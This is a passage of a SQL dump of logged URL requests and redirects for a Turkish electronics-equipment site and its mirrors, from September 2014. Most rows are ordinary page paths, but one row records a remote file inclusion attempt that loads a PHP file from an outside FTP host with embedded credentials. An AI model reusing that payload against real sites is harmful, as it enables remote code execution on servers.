00:00:00',301),(5538,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=0&lang=en','','','',1,0,'2014-09-08 13:04:55','0000-00-00 00:00:00',301),(5539,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=0&lang=tr','','','',2,0,'2014-09-08 22:33:31','0000-00-00 00:00:00',301),(5540,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=en','','','',1,0,'2014-09-09 03:18:57','0000-00-00 00:00:00',301),(5541,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/component/content/category/81-english-uk/english-content','','','',28,0,'2014-09-09 12:26:53','0000-00-00 00:00:00',301),(5542,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/component/content/category/80-turkish-tr/turkish-content','','','',41,0,'2014-09-09 12:28:33','0000-00-00 00:00:00',301),(5543,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=105&Itemid=112&lang=en','','','',43,0,'2014-09-09 15:36:14','0000-00-00 00:00:00',301),(5544,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=105&Itemid=112&lang=tr','','','',40,0,'2014-09-09 15:36:20','0000-00-00 00:00:00',301),(5545,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=tr','','','',32,0,'2014-09-09 15:36:23','0000-00-00 00:00:00',301),(5546,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=127&Itemid=134&lang=en','','','',40,0,'2014-09-09 15:36:27','0000-00-00 00:00:00',301),(5547,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=127&Itemid=134&lang=tr','','','',38,0,'2014-09-09 15:36:31','0000-00-00 00:00:00',301),(5548,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=147&Itemid=146&lang=tr','','','',36,0,'2014-09-09 15:36:34','0000-00-00 00:00:00',301),(5549,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=tr','','','',22,0,'2014-09-09 15:36:38','0000-00-00 00:00:00',301),(5550,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=112&Itemid=123&lang=tr','','','',72,0,'2014-09-09 18:42:13','0000-00-00 00:00:00',301),(5551,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=113&Itemid=125&lang=tr','','','',73,0,'2014-09-09 18:42:23','0000-00-00 00:00:00',301),(5552,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=tr','','','',64,0,'2014-09-09 18:42:36','0000-00-00 00:00:00',301),(5553,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=120&Itemid=116&lang=tr','','','',39,0,'2014-09-09 18:42:44','0000-00-00 00:00:00',301),(5554,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=tr','','','',31,0,'2014-09-09 18:42:51','0000-00-00 00:00:00',301),(5555,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=tr','','','',31,0,'2014-09-09 18:43:00','0000-00-00 00:00:00',301),(5556,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=155&Itemid=81&lang=tr','','','',35,0,'2014-09-09 18:43:08','0000-00-00 00:00:00',301),(5557,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=tr','','','',21,0,'2014-09-09 18:43:20','0000-00-00 00:00:00',301),(5558,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=156&Itemid=157&lang=tr','','','',35,0,'2014-09-09 18:43:33','0000-00-00 00:00:00',301),(5559,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=tr','','','',31,0,'2014-09-09 18:43:40','0000-00-00 00:00:00',301),(5560,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=80&Itemid=87&lang=tr','','','',33,0,'2014-09-09 18:44:29','0000-00-00 00:00:00',301),(5561,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=98&Itemid=109','','','',2,0,'2014-09-09 21:08:53','0000-00-00 00:00:00',301),(5562,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122&Itemid=129','','','',1,0,'2014-09-09 21:43:53','0000-00-00 00:00:00',301),(5563,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=62&lang=tr','','','',1,0,'2014-09-09 22:22:12','0000-00-00 00:00:00',301),(5564,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=71:rl131&catid=42:th-dizgi&Itemid=0&lang=tr','','','',1,0,'2014-09-09 22:55:11','0000-00-00 00:00:00',301),(5565,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=en','','','',1,0,'2014-09-10 13:28:06','0000-00-00 00:00:00',301),(5566,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=0&lang=tr','','','',1,0,'2014-09-10 14:05:53','0000-00-00 00:00:00',301),(5567,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=tr','','','',13,0,'2014-09-10 21:17:47','0000-00-00 00:00:00',301),(5568,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=0&lang=tr','','','',1,0,'2014-09-11 02:48:04','0000-00-00 00:00:00',301),(5569,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en&limitstart=5','','','',2,0,'2014-09-11 06:28:58','0000-00-00 00:00:00',301),(5570,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=42&Itemid=0&lang=tr','','','',1,0,'2014-09-11 06:50:35','0000-00-00 00:00:00',301),(5571,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=149&lang=en','','','',2,0,'2014-09-11 07:40:59','0000-00-00 00:00:00',301),(5572,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=tr','','','',2,0,'2014-09-11 12:08:36','0000-00-00 00:00:00',301),(5573,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=en','','','',2,0,'2014-09-11 14:14:55','0000-00-00 00:00:00',301),(5574,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=tr','','','',1,0,'2014-09-11 14:33:51','0000-00-00 00:00:00',301),(5575,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=125&Itemid=131&lang=en','','','',4,0,'2014-09-11 15:05:26','0000-00-00 00:00:00',301),(5576,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=en','','','',3,0,'2014-09-11 16:40:14','0000-00-00 00:00:00',301),(5577,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=56&lang=en','','','',6,0,'2014-09-11 18:52:48','0000-00-00 00:00:00',301),(5578,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=en','','','',2,0,'2014-09-11 19:01:28','0000-00-00 00:00:00',301),(5579,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=155&lang=tr','','','',1,0,'2014-09-11 22:02:22','0000-00-00 00:00:00',301),(5580,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=61&lang=en','','','',2,0,'2014-09-11 22:52:51','0000-00-00 00:00:00',301),(5581,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160&Itemid=161&lang=tr','','','',1,0,'2014-09-12 00:23:17','0000-00-00 00:00:00',301),(5582,'http://www.3s-technologies.com.tr//index.php/tr/ueruenler/temizleme-makineleri','','','',2,0,'2014-09-12 02:15:53','0000-00-00 00:00:00',301),(5583,'http://www.3s-technologies.com.tr//index.php/tr/ueruenler/smd-d???k-h?zl??','','','',2,0,'2014-09-12 02:16:30','0000-00-00 00:00:00',301),(5584,'http://www.3s-technologies.com.tr//index.php/tr/iletisim','','','',2,0,'2014-09-12 02:16:48','0000-00-00 00:00:00',301),(5585,'http://www.3s-technologies.com.tr//index.php/tr/ueruenler/manufacturers/ddm-novastar','','','',1,0,'2014-09-12 02:18:36','0000-00-00 00:00:00',301),(5586,'http://www.3s-technologies.com.tr//index.php/tr/ueruenler/?ubuk-lehim?','','','',2,0,'2014-09-12 02:19:33','0000-00-00 00:00:00',301),(5587,'http://www.3s-technologies.com.tr//index.php/tr/ueruenler/screen-printer','','','',2,0,'2014-09-12 02:20:12','0000-00-00 00:00:00',301),(5588,'http://www.3s-technologies.com.tr//index.php/tr/kart-ueretim-teknolojileri','','','',1,0,'2014-09-12 02:23:16','0000-00-00 00:00:00',301),(5589,'http://www.3s-technologies.com.tr//index.php/tr/','','','',1,0,'2014-09-12 02:23:50','0000-00-00 00:00:00',301),(5590,'http://www.3s-technologies.com.tr//index.php/en/','','','',2,0,'2014-09-12 02:31:12','0000-00-00 00:00:00',301),(5591,'http://www.3s-technologies.com.tr//index.php/en/about-us','','','',2,0,'2014-09-12 02:31:17','0000-00-00 00:00:00',301),(5592,'http://www.3s-technologies.com.tr//index.php/en/contacts-en','','','',2,0,'2014-09-12 02:31:21','0000-00-00 00:00:00',301),(5593,'http://www.3s-technologies.com.tr//index.php/tr/ueruenler/manufacturers/tolo','','','',1,0,'2014-09-12 02:32:27','0000-00-00 00:00:00',301),(5594,'http://www.3s-technologies.com.tr//index.php/tr/ueruenler/manufacturers/panasonic','','','',1,0,'2014-09-12 02:33:06','0000-00-00 00:00:00',301),(5595,'http://www.3s-technologies.com.tr//index.php/tr/ueruenler/smd-orta-h?zl??','','','',1,0,'2014-09-12 02:33:47','0000-00-00 00:00:00',301),(5596,'http://www.3s-technologies.com.tr//index.php/tr/kursunsuz-lehim','','','',2,0,'2014-09-12 02:34:31','0000-00-00 00:00:00',301),(5597,'http://www.3s-technologies.com.tr//index.php/tr/ueruenler/smd-ultra-h?z?','','','',2,0,'2014-09-12 02:37:13','0000-00-00 00:00:00',301),(5598,'http://www.3s-technologies.com.tr//index.php/tr/ueruenler/b?lgesel-lehimleme?','','','',2,0,'2014-09-12 02:37:42','0000-00-00 00:00:00',301),(5599,'http://www.3s-technologies.com.tr//index.php/tr/ueruenler/thru-hole','','','',1,0,'2014-09-12 02:38:12','0000-00-00 00:00:00',301),(5600,'http://www.3s-technologies.com.tr//index.php/tr/ueruenler','','','',1,0,'2014-09-12 02:38:20','0000-00-00 00:00:00',301),(5601,'http://www.3s-technologies.com.tr//index.php/tr/ueruenler/konveyorler','','','',2,0,'2014-09-12 02:38:22','0000-00-00 00:00:00',301),(5602,'http://www.3s-technologies.com.tr//index.php/tr/ueruenler/krem-lehim','','','',1,0,'2014-09-12 02:39:24','0000-00-00 00:00:00',301),(5603,'http://www.3s-technologies.com.tr//index.php/tr/dalga-lehimleme','','','',2,0,'2014-09-12 02:42:18','0000-00-00 00:00:00',301),(5604,'http://www.3s-technologies.com.tr//index.php/tr/ueruenler/flux','','','',1,0,'2014-09-12 02:43:29','0000-00-00 00:00:00',301),(5605,'http://www.3s-technologies.com.tr//index.php/tr/ueruenler/manufacturers/mirae','','','',2,0,'2014-09-12 02:45:29','0000-00-00 00:00:00',301),(5606,'http://www.3s-technologies.com.tr//index.php/tr/ueruenler/manufacturers/aqueous','','','',2,0,'2014-09-12 02:47:54','0000-00-00 00:00:00',301),(5607,'http://www.3s-technologies.com.tr//index.php/tr/ueruenler/tel-lehim','','','',1,0,'2014-09-12 02:48:19','0000-00-00 00:00:00',301),(5608,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',33,0,'2014-09-12 03:19:20','0000-00-00 00:00:00',301),(5609,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',16,0,'2014-09-12 03:19:29','0000-00-00 00:00:00',301),(5610,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/welcome.html','','','',65,0,'2014-09-12 03:19:46','0000-00-00 00:00:00',301),(5611,'http://www.3s-technologies.com.tr//index.php/tr/ueruenler/smd-f?r?n?','','','',2,0,'2014-09-12 03:35:31','0000-00-00 00:00:00',301),(5612,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137&Itemid=139&lang=tr','','','',1,0,'2014-09-12 03:59:55','0000-00-00 00:00:00',301),(5613,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/parks-home','','','',37,0,'2014-09-12 04:12:40','0000-00-00 00:00:00',301),(5614,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&Itemid=92','','','',4,0,'2014-09-12 04:23:31','0000-00-00 00:00:00',301),(5615,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152&Itemid=153&lang=en','','','',1,0,'2014-09-12 04:58:13','0000-00-00 00:00:00',301),(5616,'http://www.3s-technologies.com.tr//index.php/tr/ueruenler/manufacturers/kester','','','',1,0,'2014-09-12 04:58:52','0000-00-00 00:00:00',301),(5617,'http://www.3s-technologies.com.tr//index.php/tr/ueruenler/dalga-lehim','','','',1,0,'2014-09-12 05:20:01','0000-00-00 00:00:00',301),(5618,'http://www.3s-technologies.com.tr//index.php/tr/ueruenler/lehimleme-malzemeleri','','','',1,0,'2014-09-12 05:22:21','0000-00-00 00:00:00',301),(5619,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=en','','','',8,0,'2014-09-12 06:17:57','0000-00-00 00:00:00',301),(5620,'http://www.3s-technologies.com.tr/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',307,0,'2014-09-12 08:38:45','0000-00-00 00:00:00',301),(5621,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=111&Itemid=122&lang=en','','','',1,0,'2014-09-12 08:56:11','0000-00-00 00:00:00',301),(5622,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=124&Itemid=130&lang=en','','','',1,0,'2014-09-12 09:21:24','0000-00-00 00:00:00',301),(5623,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=0&lang=tr','','','',1,0,'2014-09-12 14:45:33','0000-00-00 00:00:00',301),(5624,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=159&Itemid=162&lang=tr','','','',28,0,'2014-09-12 15:10:21','0000-00-00 00:00:00',301),(5625,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&Itemid=99&lang=tr','','','',2,0,'2014-09-12 15:57:32','0000-00-00 00:00:00',301),(5626,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109&Itemid=120&lang=en','','','',2,0,'2014-09-12 21:07:11','0000-00-00 00:00:00',301),(5627,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en&limitstart=5','','','',2,0,'2014-09-12 23:15:30','0000-00-00 00:00:00',301),(5628,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=81&Itemid=40&lang=en','','','',1,0,'2014-09-13 02:08:16','0000-00-00 00:00:00',301),(5629,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=110&lang=en','','','',1,0,'2014-09-13 03:07:09','0000-00-00 00:00:00',301),(5630,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&Itemid=145&lang=en','','','',1,0,'2014-09-13 05:57:20','0000-00-00 00:00:00',301),(5631,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157&Itemid=158&lang=tr','','','',1,0,'2014-09-13 06:24:54','0000-00-00 00:00:00',301),(5632,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=85&Itemid=97','','','',3,0,'2014-09-13 07:48:36','0000-00-00 00:00:00',301),(5633,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=en','','','',2,0,'2014-09-13 07:55:09','0000-00-00 00:00:00',301),(5634,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146&Itemid=148&lang=en','','','',3,0,'2014-09-13 08:47:31','0000-00-00 00:00:00',301),(5635,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112&Itemid=123&lang=en','','','',3,0,'2014-09-13 09:33:20','0000-00-00 00:00:00',301),(5636,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=55&lang=en','','','',2,0,'2014-09-13 11:44:13','0000-00-00 00:00:00',301),(5637,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=88&Itemid=100&lang=en','','','',2,0,'2014-09-13 12:43:08','0000-00-00 00:00:00',301),(5638,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=127&Itemid=134&lang=en','','','',14,0,'2014-09-13 13:07:16','0000-00-00 00:00:00',301),(5639,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=127&Itemid=134&lang=tr','','','',14,0,'2014-09-13 13:07:44','0000-00-00 00:00:00',301),(5640,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=108&Itemid=119&lang=en','','','',13,0,'2014-09-13 13:38:04','0000-00-00 00:00:00',301),(5641,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=en','','','',12,0,'2014-09-13 13:38:40','0000-00-00 00:00:00',301),(5642,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=115&Itemid=126&lang=en','','','',12,0,'2014-09-13 13:39:22','0000-00-00 00:00:00',301),(5643,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=119&Itemid=117&lang=en','','','',12,0,'2014-09-13 13:40:16','0000-00-00 00:00:00',301),(5644,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=tr','','','',2,0,'2014-09-13 14:39:25','0000-00-00 00:00:00',301),(5645,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=105&Itemid=112&lang=en','','','',14,0,'2014-09-13 15:40:24','0000-00-00 00:00:00',301),(5646,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=en','','','',14,0,'2014-09-13 15:40:28','0000-00-00 00:00:00',301),(5647,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=106&Itemid=113&lang=en','','','',14,0,'2014-09-13 15:40:32','0000-00-00 00:00:00',301),(5648,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=120&Itemid=116&lang=en','','','',14,0,'2014-09-13 15:40:36','0000-00-00 00:00:00',301),(5649,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=122&Itemid=129&lang=en','','','',14,0,'2014-09-13 15:40:40','0000-00-00 00:00:00',301),(5650,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=147&Itemid=146&lang=en','','','',14,0,'2014-09-13 15:40:45','0000-00-00 00:00:00',301),(5651,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=155&Itemid=81&lang=en','','','',14,0,'2014-09-13 15:40:50','0000-00-00 00:00:00',301),(5652,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=155&Itemid=81&lang=tr','','','',14,0,'2014-09-13 15:40:56','0000-00-00 00:00:00',301),(5653,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=156&Itemid=157&lang=tr','','','',14,0,'2014-09-13 15:41:01','0000-00-00 00:00:00',301),(5654,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=159&Itemid=162&lang=en','','','',14,0,'2014-09-13 15:41:07','0000-00-00 00:00:00',301),(5655,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=160&Itemid=161&lang=en','','','',14,0,'2014-09-13 15:41:11','0000-00-00 00:00:00',301),(5656,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=164&Itemid=160&lang=en','','','',14,0,'2014-09-13 15:41:16','0000-00-00 00:00:00',301),(5657,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=72&Itemid=78&lang=en','','','',14,0,'2014-09-13 15:41:47','0000-00-00 00:00:00',301),(5658,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/archived-articles/2011','','','',23,0,'2014-09-13 18:12:36','0000-00-00 00:00:00',301),(5659,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/archived-articles/2011','','','',25,0,'2014-09-13 18:12:48','0000-00-00 00:00:00',301),(5660,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164&Itemid=160&lang=tr','','','',1,0,'2014-09-13 18:16:26','0000-00-00 00:00:00',301),(5661,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=tr','','','',1,0,'2014-09-13 19:28:24','0000-00-00 00:00:00',301),(5662,'http://www.3s-technologies.com.tr/index.php?option=ftp://2014agosto:snh2323@ftp.uhserver.com/x.php?','','','',1,0,'2014-09-13 22:00:31','0000-00-00 00:00:00',301),(5663,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=110&Itemid=121&lang=en','','','',1,0,'2014-09-13 23:41:31','0000-00-00 00:00:00',301),(5664,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=0&lang=tr','','','',1,0,'2014-09-14 03:19:23','0000-00-00 00:00:00',301),(5665,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=0&lang=tr','','','',1,0,'2014-09-14 05:48:23','0000-00-00 00:00:00',301),(5666,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111&Itemid=122&lang=en','','','',3,0,'2014-09-14 06:08:37','0000-00-00 00:00:00',301),(5667,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142','','','',6,0,'2014-09-14 09:28:32','0000-00-00 00:00:00',301),(5668,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=0&lang=en','','','',1,0,'2014-09-14 09:33:27','0000-00-00 00:00:00',301),(5669,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&Itemid=0&lang=tr','','','',1,0,'2014-09-14 10:16:13','0000-00-00 00:00:00',301),(5670,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=115&Itemid=126&lang=en','','','',4,0,'2014-09-14 14:43:15','0000-00-00 00:00:00',301),(5671,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=72:av131&catid=42:th-dizgi&Itemid=0&lang=en','','','',1,0,'2014-09-14 15:20:23','0000-00-00 00:00:00',301),(5672,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=0&lang=en','','','',1,0,'2014-09-14 15:49:42','0000-00-00 00:00:00',301),(5673,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=0&lang=tr','','','',1,0,'2014-09-14 17:46:56','0000-00-00 00:00:00',301),(5674,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=tr','','','',5,0,'2014-09-14 19:43:27','0000-00-00 00:00:00',301),(5675,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=0&lang=en','','','',1,0,'2014-09-15 02:57:23','0000-00-00 00:00:00',301),(5676,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=0&lang=tr','','','',1,0,'2014-09-15 04:19:50','0000-00-00 00:00:00',301),(5677,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=0&lang=tr','','','',2,0,'2014-09-15 05:40:57','0000-00-00 00:00:00',301),(5678,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&lang=en&Itemid=0','','','',1,0,'2014-09-15 06:10:26','0000-00-00 00:00:00',301),(5679,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr&limitstart=5','','','',6,0,'2014-09-15 07:05:41','0000-00-00 00:00:00',301),(5680,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71:rl131&catid=42:th-dizgi&Itemid=0&lang=tr','','','',1,0,'2014-09-15 07:16:52','0000-00-00 00:00:00',301),(5681,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=0&lang=tr','','','',1,0,'2014-09-15 08:00:11','0000-00-00 00:00:00',301),(5682,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=en','','','',1,0,'2014-09-15 08:36:07','0000-00-00 00:00:00',301),(5683,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=en','','','',1,0,'2014-09-15 08:52:07','0000-00-00 00:00:00',301),(5684,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=0&lang=tr','','','',1,0,'2014-09-15 15:04:14','0000-00-00 00:00:00',301),(5685,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=0&lang=en','','','',1,0,'2014-09-15 15:44:35','0000-00-00 00:00:00',301),(5686,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&Itemid=0&lang=en','','','',1,0,'2014-09-15 17:33:00','0000-00-00 00:00:00',301),(5687,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150&Itemid=151','','','',2,0,'2014-09-15 